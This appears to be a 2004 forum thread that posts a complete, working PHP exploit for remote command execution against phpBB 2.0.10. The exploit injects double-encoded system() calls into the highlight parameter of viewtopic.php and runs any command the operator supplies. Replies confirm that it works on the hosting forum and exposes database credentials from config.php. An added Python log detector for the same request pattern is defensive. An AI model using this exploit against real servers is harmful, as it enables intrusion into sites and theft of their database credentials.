# phpBB 2.0.10 execute command Exploits



## firewall (Nov 26, 2004)

Remote command execution exploit for phpBB 2.0.10 that makes use of a flaw in the viewtopic.php code. 


```php
#!/usr/bin/php -q
<?php
/*
# phpBB 2.0.10 execute command by pokleyzz <pokleyzz at scan-associates.net>
# 15th November 2004 : 4:04 a.m
#
# bug found by How Dark (*www.howdark.com) (1st October 2004)
#
# Requirement:
#
#    PHP 4.x with curl extension;
#
# ** Selamat Hari Raya **
*/

if (!(function_exists('curl_init'))) {
    echo "cURL extension required\n";
    exit;
}

if ($argv[2]){
    $url = $argv[1];
    $command = $argv[2];
}
else {
    echo "Usage: ".$argv[0]." <URL> <command> [topic id] [proxy]\n\n";
    echo "\tURL\t URL to phpnBB site (ex: *127.0.0.1/html)\n";
    echo "\tcommand\t command to execute on server (ex: 'ls -la')\n";
    echo "\ttopic_id\t topic id\n";
    echo "\tproxy\t optional proxy url (ex: *10.10.10.10:8080)\n";
    exit;
}
if ($argv[3])
    $topic = $argv[3];
else
    $topic = 1;

if ($argv[4])
    $proxy = $argv[4];


$cmd = str2chr($command);

$action = "/viewtopic.php?t=$topic&highlight=%2527%252esystem(".$cmd." )%252e%2527";       
$ch=curl_init();
if ($proxy){
    curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url.$action);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$res=curl_exec ($ch);
curl_close ($ch);
echo $res;

function str2chr($str){

    for($i = 0;$i < strlen($str);$i++){
        $chr .= "chr(".ord($str{$i}).")";
        if ($i != strlen($str) -1)
             $chr .= "%252e";   
    }
    return $chr;
}
?>
```

--- Don't ask how to use it..... ----


----------
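
A defender-side check for the request shape the script above produces, where the quote and dot in `highlight` are percent-encoded twice (`%2527`, `%252e`). This is an added example, not part of the original post; the log format (Combined Log Format), the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line inside a Combined Log Format entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MAX_ROUNDS = 5  # bound on repeated decoding (assumed limit)

# Constructed sample log lines (documentation addresses, placeholder payload "X").
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Nov/2004:10:01:02 +0000] "GET /forum/viewtopic.php'
    '?t=1&highlight=linux+kernel HTTP/1.1" 200 5120',
    '192.0.2.44 - - [26/Nov/2004:10:03:17 +0000] "GET /forum/viewtopic.php'
    '?t=1&highlight=%2527%252eX%252e%2527 HTTP/1.0" 200 9301',
    '192.0.2.10 - - [26/Nov/2004:10:04:40 +0000] "GET /forum/viewtopic.php'
    '?t=7&highlight=don%27t HTTP/1.1" 200 4880',
]

def decode_fully(value):
    """Percent-decode until stable; return (decoded, number of extra rounds)."""
    rounds = 0
    while rounds < MAX_ROUNDS:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

def check_line(line):
    """Return a finding string for a suspicious highlight value, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.endswith("/viewtopic.php"):
        return None
    # parse_qsl does the first decode, as the server does for query parameters.
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if key == "highlight":
            decoded, extra = decode_fully(value)
            if "'" in decoded:
                return ("double" if extra else "single") + "-encoded quote in highlight"
            if extra:
                return "multiply-encoded highlight"
    return None

def scan(lines):
    """Return (line_number, finding) pairs for every flagged line."""
    return [(n, f) for n, line in enumerate(lines, 1) if (f := check_line(line))]
```

Ordinary search terms containing an apostrophe land in the single-encoded bucket, so only the double-encoded finding is a high-confidence signal.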



## it_waaznt_me (Nov 26, 2004)

Ha Ha ha ...


----------



## go4inet (Nov 27, 2004)

lol @ you guys, when you run those exploits, you can see the dbname, dbadmin, dbhost from the config.php file!

I don't think this is allowed here? Batty?


----------



## flashweb (Nov 27, 2004)

Yes, the exploit is valid for this forum.

But here the forum runs as nobody. Still, it will show the content of PHP files, directory listings etc... If you run the forum as a privileged user (phpsuexec) anyone can hack the web site. It is very easy to patch this exploit

*www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513


----------



## go4inet (Nov 28, 2004)

I am waiting for digit forum to update with v2.0.11! Guess that's the latest version!


----------

